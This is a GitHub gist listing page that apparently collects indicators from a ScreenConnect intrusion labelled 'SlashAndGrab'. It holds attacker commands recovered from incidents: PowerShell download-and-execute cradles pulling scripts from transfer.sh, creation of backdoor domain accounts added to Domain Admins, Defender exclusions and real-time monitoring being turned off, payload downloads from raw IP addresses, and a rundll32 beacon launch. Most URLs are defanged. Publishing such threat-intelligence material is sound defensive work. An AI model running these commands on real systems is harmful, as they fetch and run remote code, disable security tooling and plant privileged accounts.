Skip to content

Instantly share code, notes, and snippets.

View Purp1eW0lf's full-sized avatar

Dray Agha Purp1eW0lf

291 followers · 4 following
View GitHub Profile
@Purp1eW0lf
Purp1eW0lf / SlashAndGrab_inject.ps1
Created February 23, 2024 16:35
powershell -command \"iex ((New-Object System.Net.WebClient).DownloadString('https://transfer[.]sh/GElU1LmvbS/injcet.ps1'))\"
# Check for Administrator rights
if (-NOT ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] 'Administrator')) {
Write-Host 'Please Run as Administrator!' -ForegroundColor Red
Exit
}
# Check and return current user name
$currentUserName = [System.Security.Principal.WindowsIdentity]::GetCurrent().Name.Split('\')[1]
# Paths
@Purp1eW0lf
Purp1eW0lf / SlashAndGrab_application_extract.evtx
Created February 23, 2024 16:34
# Excerpt from Application.evtx EventID 0
EventData:
Data:
- "Transferred files with action 'Transfer':\r\nRunSchedulerTask.ps1\r\nRunSchedulerTaskOnce.ps1\r\n\r\nVersion: 22.10.11109.8417\r\nExecutable Path: C:\\Program Files (x86)\\ScreenConnect Client (9dd8b1107d6a42d9)\\ScreenConnect.ClientService.exe\r\n"
Channel: Application
EventID: 0
EventID_attributes:
SystemTime: "2024-02-23T04:06:06Z"
@Purp1eW0lf
Purp1eW0lf / SlashAndGrab_new_users.ps1
Created February 23, 2024 16:32
net user /add default test@2021! /domain
net group \"Domain Admins\" default /add /domain
net group \"Enterprise Admins\" default /add /domain
net group \"Remote Desktop Users\" default /add /domain
net group \"Group Policy Creator Owners\" default /add /domain
net group \"Schema Admins\" default /add /domain
net user default /active:yes /domain
net user /add default1 test@2021! /domain
net user /add default1 test@2021! /domain
@Purp1eW0lf
Purp1eW0lf / SlashAndGrab_beacon_evade.ps1
Created February 23, 2024 16:31
# Downloaded from hxxp[://]minish[.]wiki[.]gd/c[.]pdf
#Exclude directory in Defender
powershell.exe Add-MpPreference -ExclusionPath C:\\programdata -Force
#Deploy beacon
rundll32.exe c:\\programdata\\update.dat UpdateSystem
@Purp1eW0lf
Purp1eW0lf / SlashAndGrab_transfer_extract.ps1
Created February 23, 2024 16:30
$listi = 'hxxps[://]transfer[.]sh/UFQTwgYszH/config14[.]json',
\'hxxps[://]transfer[.]sh/ATVMNG5Pbu/config13[.]json',
\'hxxps[://]transfer[.]sh/s27p8BcTxi/config12[.]json',
\'hxxps[://]transfer[.]sh/ojw6aKoA4A/config11[.]json',
\'hxxps[://]transfer[.]sh/lyEkHLGt03/config10[.]json',
\'hxxps[://]transfer[.]sh/8l4d5qR39o/config9[.]json',
\'hxxps[://]transfer[.]sh/xkIMWnocQH/config8[.]json',
\'hxxps[://]transfer[.]sh/Db5eUfqKP9/config7[.]json',
\'hxxps[://]transfer[.]sh/L1e30KShXP/config6[.]json',
\'hxxps[://]transfer[.]sh/w2Y0iuEKiY/config5[.]json',
@Purp1eW0lf
Purp1eW0lf / SlashAndGrab_transfer.ps1
Created February 23, 2024 16:29
powershell -command \"iex ((New-Object System[.]Net[.]WebClient).DownloadString('hxxps[://]transfer[.]sh/gUHRYTNxj8/injcet2[.]ps1'))\"
@Purp1eW0lf
Purp1eW0lf / SlashAndGrab_curl_dat.ps1
Created February 23, 2024 16:29
curl hxxp[://]minish[.]wiki[.]gd/c[.]pdf -o c:\\programdata\\update[.]dat
@Purp1eW0lf
Purp1eW0lf / SlashAndGrab_svchost.ps1
Created February 23, 2024 16:27
#adversary excluded directories and neutralised Defender
powershell -ep bypass -c \"Set-MpPreference -DisableRealtimeMonitoring $true;
Set-MpPreference -ExclusionPath C:\\Windows\\Temp;
#then downloaded their file
Invoke-WebRequest http://159[.]65[.]130[.]146:4444/svchost.exe -OutFile C:\\Windows\\Temp\\svchost.exe;
C:\\Windows\\Temp\\svchost.exe
@Purp1eW0lf
Purp1eW0lf / SlashAndGrab_servicetest2.ps1
Created February 23, 2024 16:25
powershell.exe -command "& Invoke-RestMethod -Uri \"http[:]//91.92.241.199:8080/servicetest2.dll\" -OutFile servicehost.dll
@Purp1eW0lf
Purp1eW0lf / SlashAndGrab_curl.ps1
Created February 23, 2024 16:24
curl https[:]//cmctt.]com/pub/media/wysiwyg/sun.png
curl https[:]//cmctt[.]com/pub/media/wysiwyg/invoke.png